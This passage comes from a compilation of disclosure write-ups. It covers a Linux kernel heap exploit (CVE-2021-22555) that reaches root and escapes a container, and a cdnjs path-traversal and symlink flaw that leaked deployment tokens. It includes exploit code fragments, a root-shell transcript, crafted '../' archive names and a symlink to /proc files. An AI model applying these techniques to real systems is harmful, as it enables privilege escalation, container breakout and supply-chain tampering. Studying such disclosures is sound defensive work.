Then, we send one message of size 4096 (including the struct msg_msg header) for each of the message queues using msgsnd(), which we will call the primary message. Eventually, after a lot of messages, we have some that are consecutive:

[Figure 1: A series of blocks of primary messages]

Next, we send a secondary message of size 1024 for each of the message queues using msgsnd():

[Figure 2: A series of blocks of primary messages pointing to secondary messages]

Finally, we create some holes (in our case every 1024th) in the primary messages and trigger the vulnerable setsockopt(IPT_SO_SET_REPLACE) option, which, in the best scenario, will allocate the struct xt_table_info object in one of the holes:

[Figure 3: A xt_table_info allocated in between the blocks which corrupts the next pointer]

We choose to overwrite two bytes of the adjacent object with zeros. Assuming we are adjacent to another primary message, the bytes we overwrite are part of the pointer to the secondary message. Since we allocate the secondary messages with a size of 1024 bytes, we have a 1 - (1024 / 65536) chance to redirect the pointer (the only case where we fail is when the two least significant bytes of the pointer are already zero).

Now, the best scenario we can hope for is that the manipulated pointer also points to a secondary message, since the consequence will be two different primary messages pointing to the same secondary message, and this can lead to a use-after-free:

[Figure 4: Two primary messages pointing to the same secondary message due to the corrupted pointer]

However, how do we know which two primary messages point to the same secondary message? To answer this question, we tag every (primary and secondary) message with the index of its message queue, which is in [0, 4096). Then, after triggering the corruption, we iterate through all message queues, peek at all messages using msgrcv() with MSG_COPY, and see if they are the same.
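As an aside, the 1 - (1024 / 65536) estimate above can be sanity-checked by simulating the two-byte overwrite on random 1024-aligned heap addresses (a simplified model of the allocator, not the real heap):

```python
import random

# Sketch: zeroing the two least significant bytes of a pointer snaps it down
# to the 64 KiB boundary below. The overwrite only fails to *move* the
# pointer when those two bytes were already zero.
random.seed(0)
TRIALS = 100_000
moved = 0
for _ in range(TRIALS):
    # Hypothetical 1024-aligned secondary-message address.
    ptr = 0xffff91a400000000 + random.randrange(0, 1 << 32, 1024)
    corrupted = ptr & ~0xffff   # two low bytes overwritten with zeros
    if corrupted != ptr:
        moved += 1

print(moved / TRIALS)   # close to 1 - 1024/65536 = 0.984375
```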
If the tag of the primary message differs from that of the secondary message, it means the pointer has been redirected. In that case, the tag of the primary message represents the index of the fake message queue, i.e. the one containing the wrong secondary message, and the tag of the wrong secondary message represents the index of the real message queue. Knowing these two indices, achieving a use-after-free is now trivial: we fetch the secondary message from the real message queue using msgrcv() and thereby free it:

[Figure 5: Freed secondary message with a stale reference]

Note that we still have a reference to the freed message in the fake message queue.

Bypassing SMAP

Using unix sockets (which can be easily set up with socketpair()), we now spray a lot of messages of size 1024 and imitate the struct msg_msg header. Ideally, we are able to reclaim the address of the previously freed message:

[Figure 6: Fake struct msg_msg put in place of the freed secondary message]

Note that mlist.next is 41414141, as we do not yet know any kernel addresses (when SMAP is enabled, we cannot specify a user address). Not having a kernel address is crucial, as it actually prevents us from freeing the block again (you will learn later why that is desired). The reason is that during msgrcv(), the message is unlinked from the message queue, which is a circular list. Luckily, we are actually in a good position to achieve an information leak, as there are some interesting fields in struct msg_msg. Namely, the field m_ts is used to determine how much data to return to userland:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c
struct msg_msg *copy_msg(struct msg_msg *src, struct msg_msg *dst)
{
	struct msg_msgseg *dst_pseg, *src_pseg;
	size_t len = src->m_ts;
	size_t alen;

	if (src->m_ts > dst->m_ts)
		return ERR_PTR(-EINVAL);

	alen = min(len, DATALEN_MSG);
	memcpy(dst + 1, src + 1, alen);
	...
	return dst;
}

The original size of the message is only 1024 - sizeof(struct msg_msg) bytes, which we can now artificially increase to DATALEN_MSG = 4096 - sizeof(struct msg_msg). As a consequence, we will now be able to read past the intended message size and leak the struct msg_msg header of the adjacent message. As said before, the message queue is implemented as a circular list; thus, mlist.next points back to the primary message.

Knowing the address of a primary message, we can re-craft the fake struct msg_msg with that address as next (meaning that it is the next segment). The content of the primary message can then be leaked by reading more than DATALEN_MSG bytes. The leaked mlist.next pointer from the primary message reveals the address of the secondary message that is adjacent to our fake struct msg_msg. Subtracting 1024 from that address, we finally have the address of the fake message.

Achieving a better use-after-free

Now, we can rebuild the fake struct msg_msg object with the leaked address as mlist.next and mlist.prev (meaning that it points to itself), making the fake message free-able through the fake message queue.

[Figure 7: Fake struct msg_msg with a valid next pointer pointing to itself]

Note that when spraying using unix sockets, we actually have a struct sk_buff object which points to the fake message. Obviously, this means that when we free the fake message, we still have a stale reference:

[Figure 8: Freed fake message with a stale reference]

This stale struct sk_buff data buffer is a better use-after-free scenario to exploit, because it does not contain header information, meaning that we can now use it to free any kind of object on the slab. In comparison, freeing a struct msg_msg object is only possible if the first two members are writable pointers (needed to unlink the message).

Finding a victim object

The best victim to attack is one that has a function pointer in its structure.
Remember that the victim must also be allocated with GFP_KERNEL_ACCOUNT. Talking to Jann Horn, he suggested the struct pipe_buffer object, which is allocated in kmalloc-1024 (hence why the secondary message is 1024 bytes). The struct pipe_buffer can easily be allocated with pipe(), which has alloc_pipe_info() as a subroutine:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/pipe.c
struct pipe_inode_info *alloc_pipe_info(void)
{
	...
	unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
	...
	pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
	if (pipe == NULL)
		goto out_free_uid;
	...
	pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
			     GFP_KERNEL_ACCOUNT);
	...
}

While it does not contain a function pointer directly, it contains a pointer to struct pipe_buf_operations, which in turn has function pointers:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/pipe_fs_i.h
struct pipe_buffer {
	struct page *page;
	unsigned int offset, len;
	const struct pipe_buf_operations *ops;
	unsigned int flags;
	unsigned long private;
};

struct pipe_buf_operations {
	...
	/*
	 * When the contents of this pipe buffer has been completely
	 * consumed by a reader, ->release() is called.
	 */
	void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
	...
};

Bypassing KASLR/SMEP

When one writes to the pipes, struct pipe_buffer is populated. Most importantly, ops will point to the static structure anon_pipe_buf_ops, which resides in the .data segment:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/pipe.c
static const struct pipe_buf_operations anon_pipe_buf_ops = {
	.release	= anon_pipe_buf_release,
	.try_steal	= anon_pipe_buf_try_steal,
	.get		= generic_pipe_buf_get,
};

Since the difference between the .data segment and the .text segment is always the same, having anon_pipe_buf_ops basically allows us to calculate the kernel base address.
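Rebasing from such a leak is simple arithmetic: the distance between anon_pipe_buf_ops and the kernel base is constant for a given build. For illustration, with a leaked pointer of 0xffffffffa1e78380 and a build-specific .data offset of 0x1078380 (the delta implied by the exploit's output; both values are specific to that kernel build):

```python
# Sketch: deriving the kernel base from a leaked anon_pipe_buf_ops pointer.
leaked_ops = 0xffffffffa1e78380   # read back via the stale sk_buff buffer
data_offset = 0x1078380           # build-specific offset of anon_pipe_buf_ops

kbase = leaked_ops - data_offset
print(hex(kbase))   # 0xffffffffa0e00000
```

With the base in hand, any gadget address is just base plus its build-specific offset.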
We spray a lot of struct pipe_buffer objects and reclaim the location of the stale struct sk_buff data buffer:

[Figure 9: Freed fake message reclaimed with a struct pipe_buffer]

As we still have a reference from the struct sk_buff, we can read its data buffer, leak the content of struct pipe_buffer and reveal the address of anon_pipe_buf_ops:

[+] anon_pipe_buf_ops: ffffffffa1e78380
[+] kbase_addr: ffffffffa0e00000

With this information, we can now find JOP/ROP gadgets. Note that when reading from the unix socket, we actually free its buffer as well:

[Figure 10: Freed fake message reclaimed with a struct pipe_buffer]

Escalating privileges

We reclaim the stale struct pipe_buffer with a fake one whose ops points to a fake struct pipe_buf_operations. This fake structure is planted at the same location, since we know its address, and obviously it should contain a malicious function pointer as release.

[Figure 11: Freed struct pipe_buffer reclaimed with a fake struct pipe_buffer]

The final stage of the exploit is to close all pipes in order to trigger release, which in turn will kick off the JOP chain. Finding JOP gadgets is hard, thus the goal is to achieve a kernel stack pivot as soon as possible in order to execute a kernel ROP chain.

Kernel ROP chain

We save the value of RBP at some scratchpad address in the kernel so that we can later resume execution, then we call commit_creds(prepare_kernel_cred(NULL)) to install kernel credentials, and finally we call switch_task_namespaces(find_task_by_vpid(1), init_nsproxy) to switch the namespace of process 1 to that of the init process. After that, we restore the value of RBP and return to resume execution (which will immediately make free_pipe_info() return).

Escaping the container and popping a root shell

Arriving back in userland, we now have root permissions to change the mnt, pid and net namespaces to escape the container and break out of the Kubernetes pod. Ultimately, we pop a root shell.
setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
setns(open("/proc/1/ns/pid", O_RDONLY), 0);
setns(open("/proc/1/ns/net", O_RDONLY), 0);

char *args[] = {"/bin/bash", "-i", NULL};
execve(args[0], args, NULL);

Proof-Of-Concept

The Proof-Of-Concept is available at https://github.com/google/security-research/tree/master/pocs/linux/cve-2021-22555. Executing it on a vulnerable machine will grant you root:

theflow@theflow:~$ gcc -m32 -static -o exploit exploit.c
theflow@theflow:~$ ./exploit
[+] Linux Privilege Escalation by theflow@ - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: ffc
[+] real_idx: fc4

[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff91a49cb7f000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff91a49c7a0000

[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffa1e78380
[+] kbase_addr: ffffffffa0e00000

[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
[*] Checking for root...
[+] Root privileges gained.

[+] STAGE 5: Post-exploitation
[*] Escaping container...
[*] Cleaning up...
[*] Popping root shell...
root@theflow:/# id
uid=0(root) gid=0(root) groups=0(root)
root@theflow:/#

Timeline

2021-04-06 - Vulnerability reported to security@kernel.org.
2021-04-13 - Patch merged upstream.
2021-07-07 - Public disclosure.

Thanks

Eduardo Vela
Francis Perron
Jann Horn

Source: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
  14. Remote code execution in cdnjs of Cloudflare

2021-07-16 · cdnjs, Vulnerability, Go, Supply Chain, RCE

Preface

(A Japanese version is also available.)

Cloudflare, which runs cdnjs, operates a "Vulnerability Disclosure Program" on HackerOne, which allows hackers to perform vulnerability assessments. This article describes vulnerabilities reported through this program and published with the permission of the Cloudflare security team. This article is therefore not a recommendation to perform unauthorized vulnerability assessments. If you find any vulnerabilities in a Cloudflare product, please report them to Cloudflare's vulnerability disclosure program.

TL;DR

There was a vulnerability in the cdnjs library update server that could execute arbitrary commands, and as a result, cdnjs could be completely compromised. This would allow an attacker to tamper with 12.7% of all websites on the internet once caches expired.

About cdnjs

cdnjs is a JavaScript/CSS library CDN owned by Cloudflare, which is used by 12.7% of all websites on the internet as of 15 July 2021. This makes it the second most widely used library CDN after Google Hosted Libraries at 12.8%, and considering the current usage trend, it will be the most used JavaScript library CDN in the near future.

[Usage graph of cdnjs from W3Techs, as of 15 July 2021]

Reason for investigation

A few weeks before my last investigation, "Remote code execution in Homebrew by compromising the official Cask repository", I was researching supply chain attacks. While looking for a service that much software depends on and that allows users to perform vulnerability assessments, I found cdnjs, so I decided to investigate it.

Initial investigation

While browsing the cdnjs website, I found the following description:

Couldn't find the library you're looking for? You can make a request to have it added on our GitHub repository.
I found out that the library information is managed in a GitHub repository, so I checked the repositories of the GitHub organization used by cdnjs. As a result, I found that the repositories are used in the following ways:

cdnjs/packages: Stores library information that is supported in cdnjs
cdnjs/cdnjs: Stores files of libraries
cdnjs/logs: Stores update logs of libraries
cdnjs/SRIs: Stores SRI (Subresource Integrity) hashes of libraries
cdnjs/static-website: Source code of cdnjs.com
cdnjs/origin-worker: Cloudflare Worker for the origin of cdnjs.cloudflare.com
cdnjs/tools: cdnjs management tools
cdnjs/bot-ansible: Ansible repository of the cdnjs library update server

As you can see from these repositories, most of the cdnjs infrastructure is centralized in this GitHub organization. I was interested in cdnjs/bot-ansible and cdnjs/tools because they automate library updates. After reading the code of these two repositories, it turned out that cdnjs/bot-ansible periodically executes the autoupdate command of cdnjs/tools on the cdnjs library update server, to check for library updates from cdnjs/packages by downloading the npm package / Git repository.

Investigation of automatic update

The automatic update function updates a library by downloading the user-managed Git repository / npm package and copying the target files from it. The npm registry compresses libraries into .tgz archives to make them downloadable. Since the tool for this automatic update is written in Go, I guessed that it may use Go's compress/gzip and archive/tar to extract the archive file. Go's archive/tar returns the filenames contained in the archive without sanitizing them, so if the archive is extracted to disk based on the filename returned from archive/tar, archives containing filenames like ../../../../../../../tmp/test may overwrite arbitrary files on the system.
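Such a crafted archive is easy to reproduce. A minimal sketch (Python's tarfile and posixpath stand in for Go's archive/tar and filepath here; the extraction directory and run.sh path are hypothetical) builds a .tgz whose member name climbs out of the extraction directory and shows where a trusting extractor would write it:

```python
import io
import posixpath
import tarfile

# Sketch: build a .tgz whose member name escapes the extraction directory,
# then compute where an extractor that trusts the name would write the file.
buf = io.BytesIO()
payload = b"echo pwned\n"
with tarfile.open(fileobj=buf, mode="w:gz") as tar:
    info = tarfile.TarInfo(name="package/../../../../home/bot/run.sh")
    info.size = len(payload)
    tar.addfile(info, io.BytesIO(payload))

buf.seek(0)
with tarfile.open(fileobj=buf, mode="r:gz") as tar:
    member = tar.getnames()[0]   # the name comes back unsanitized

dst = "/tmp/npmtarball123"                  # hypothetical temp extraction dir
stripped = member[len("package/"):]         # what removePackageDir does
target = posixpath.normpath(posixpath.join(dst, stripped))
print(member)
print(target)   # /home/bot/run.sh, outside the extraction directory
```

Joining the untrusted member name onto the temp directory lets the '..' components take effect, which is exactly what happens in the Untar code below.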
From the information in cdnjs/bot-ansible, I knew that some scripts were running regularly and that the user running the autoupdate command had write permission on them, so I focused on overwriting files via path traversal.

Path traversal

To find a path traversal, I started reading the main function of the autoupdate command:

func main() {
	[...]
	switch *pckg.Autoupdate.Source {
	case "npm":
		{
			util.Debugf(ctx, "running npm update")
			newVersionsToCommit, allVersions = updateNpm(ctx, pckg)
		}
	case "git":
		{
			util.Debugf(ctx, "running git update")
			newVersionsToCommit, allVersions = updateGit(ctx, pckg)
		}
	[...]
}

As you can see from the code snippet above, if npm is specified as the source of the auto-update, it passes the package information to the updateNpm function:

func updateNpm(ctx context.Context, pckg *packages.Package) ([]newVersionToCommit, []version) {
	[...]
	newVersionsToCommit = doUpdateNpm(ctx, pckg, newNpmVersions)
	[...]
}

Then, updateNpm passes information about the new library version to the doUpdateNpm function:

func doUpdateNpm(ctx context.Context, pckg *packages.Package, versions []npm.Version) []newVersionToCommit {
	[...]
	for _, version := range versions {
		[...]
		tarballDir := npm.DownloadTar(ctx, version.Tarball)
		filesToCopy := pckg.NpmFilesFrom(tarballDir)
		[...]
}

And doUpdateNpm passes the URL of the .tgz file to npm.DownloadTar:

func DownloadTar(ctx context.Context, url string) string {
	dest, err := ioutil.TempDir("", "npmtarball")
	util.Check(err)

	util.Debugf(ctx, "download %s in %s", url, dest)

	resp, err := http.Get(url)
	util.Check(err)
	defer resp.Body.Close()

	util.Check(Untar(dest, resp.Body))
	return dest
}

Finally, the .tgz file obtained via http.Get is passed to the Untar function:

func Untar(dst string, r io.Reader) error {
	gzr, err := gzip.NewReader(r)
	if err != nil {
		return err
	}
	defer gzr.Close()

	tr := tar.NewReader(gzr)

	for {
		header, err := tr.Next()
		[...]
// the target location where the dir/file should be created target := filepath.Join(dst, removePackageDir(header.Name)) [...] // check the file type switch header.Typeflag { [...] // if it's a file create it case tar.TypeReg: { [...] f, err := os.OpenFile(target, os.O_CREATE|os.O_RDWR, os.FileMode(header.Mode)) [...] // copy over contents if _, err := io.Copy(f, tr); err != nil { return err } } } } } As I guessed, compress/gzip and archive/tar were used in Untar function to extract .tgz file. At first, I thought that it’s sanitizing the path in the removePackageDir function, but when I checked the contents of the function, I noticed that it’s just removing package/ from the path. From these code snippets, I confirmed that arbitrary code can be executed after performing path traversal from the .tgz file published to npm and overwriting the script that is executed regularly on the server. Demonstration of vulnerability Because Cloudflare is running a vulnerability disclosure program on HackerOne, it’s likely that HackerOne’s triage team won’t forward the report to Cloudflare unless it indicates that the vulnerability is actually exploitable. Therefore, I decided to do a demonstration to show that vulnerability can actually be exploited. The attack procedure is as follows. Publish the .tgz file that contains the crafted filename to the npm registry. Wait for the cdnjs library update server to process the crafted .tgz file. The contents of the file that is published in step 1 are written into a regularly executed script file and arbitrary command is executed. … and after writing the attack procedure into my notepad, for some reason, I started wondering how automatic updates based on the Git repository works. So, I read codes a bit before demonstrating the vulnerability, and it seemed that the symlinks aren’t considered when copying files from the Git repository. 
```go
func MoveFile(sourcePath, destPath string) error {
	inputFile, err := os.Open(sourcePath)
	if err != nil {
		return fmt.Errorf("Couldn't open source file: %s", err)
	}
	outputFile, err := os.Create(destPath)
	if err != nil {
		inputFile.Close()
		return fmt.Errorf("Couldn't open dest file: %s", err)
	}
	defer outputFile.Close()
	_, err = io.Copy(outputFile, inputFile)
	inputFile.Close()
	if err != nil {
		return fmt.Errorf("Writing to output file failed: %s", err)
	}
	// The copy was successful, so now delete the original file
	err = os.Remove(sourcePath)
	if err != nil {
		return fmt.Errorf("Failed removing original file: %s", err)
	}
	return nil
}
```

As Git supports symbolic links by default, it may be possible to read arbitrary files from the cdnjs library update server by adding a symlink to the Git repository. Since overwriting the regularly executed script file to execute arbitrary commands might break the automatic update function, I decided to check the arbitrary file read first. Along with this, the attack procedure changed as follows:

1. Add a symbolic link that points to a harmless file (I assumed /proc/self/maps here) to the Git repository.
2. Publish a new version in the repository.
3. Wait for the cdnjs library update server to process the crafted repository.
4. The specified file is published on cdnjs.

It was around 20:00 at this point, and since all I had to do was create a symlink, I decided to eat dinner after creating the symbolic link and publishing it. [5]

```shell
ln -s /proc/self/maps test.js
```

Incident

Once I finished dinner and returned to my PC, I was able to confirm that cdnjs had released a version containing the symbolic link. When I checked the contents of the file to send the report, I was surprised: clearly sensitive information such as GITHUB_REPO_API_KEY and WORKERS_KV_API_TOKEN was displayed.
I couldn't understand what had happened for a moment, but when I checked my command log, I found that I had accidentally created a link to /proc/self/environ instead of /proc/self/maps. [6]

As mentioned earlier, if cdnjs' GitHub organization is compromised, it's possible to compromise most of the cdnjs infrastructure. I needed to take immediate action, so I sent a report that only contained a link showing the current situation, and requested that they revoke all credentials. At this point I was very confused and hadn't confirmed it, but in fact, these tokens had been invalidated before I even sent the report. It seems that GitHub notified Cloudflare immediately because GITHUB_REPO_API_KEY (a GitHub API key) was included in the repository, and Cloudflare started incident response right after the notification. I felt that they have a great security team, because they invalidated all credentials within minutes of cdnjs processing the specially crafted repository.

Determining the impact

After the incident, I investigated what could have been impacted. GITHUB_REPO_API_KEY was an API key for robocdnjs, which belongs to the cdnjs organization, and had write permission to each repository. This means it was possible to tamper with arbitrary libraries on cdnjs, or with cdnjs.com itself. Also, WORKERS_KV_API_TOKEN had permission over the Cloudflare Workers KV used by cdnjs, so it could be used to tamper with the libraries in the KV cache. By combining these permissions, the core parts of cdnjs, such as the origin data of cdnjs, the KV cache, and even the cdnjs website, could be completely tampered with.

Conclusion

In this article, I described a vulnerability that existed in cdnjs. While this vulnerability could be exploited without any special skills, it could impact many websites. Given that there are many vulnerabilities in the supply chain that are easy to exploit but have a large impact, I find it very scary.
If you have any questions/comments about this article, please send a message to @ryotkak on Twitter.

Timeline

| Date (JST) | Event |
| --- | --- |
| April 6, 2021 19:00 | Found the vulnerability |
| April 6, 2021 20:00 | Published a crafted symlink |
| April 6, 2021 20:30 | cdnjs processed the file |
| (at the same time) | GitHub sent an alert to Cloudflare |
| (at the same time) | Cloudflare started an incident response |
| (within minutes) | Cloudflare finished revoking the credentials |
| April 6, 2021 20:40 | Sent the initial report |
| April 6, 2021 21:00 | Sent the detailed report |
| April 7, 2021 | A secondary fix was applied |
| June 3, 2021 | The complete fix was applied |
| July 16, 2021 | Published this article |

Footnotes

1. Quoted from W3Techs as of 15 July 2021. Due to the presence of SRI / caches, fewer websites could be tampered with immediately. ↩︎
2. Quoted from W3Techs as of 15 July 2021. ↩︎
3. https://github.com/golang/go/issues/25849 ↩︎
4. Archives like this can be created using tools such as evilarc. ↩︎
5. I don't know if this is correct, but I remember that dinner that day was frozen gyoza (dumplings). (It was yummy!) ↩︎
6. Because I was tired from work and hungry, I ran the command completed by the shell without any confirmation. ↩︎

Source: https://blog.ryotak.me/post/cdnjs-remote-code-execution-en/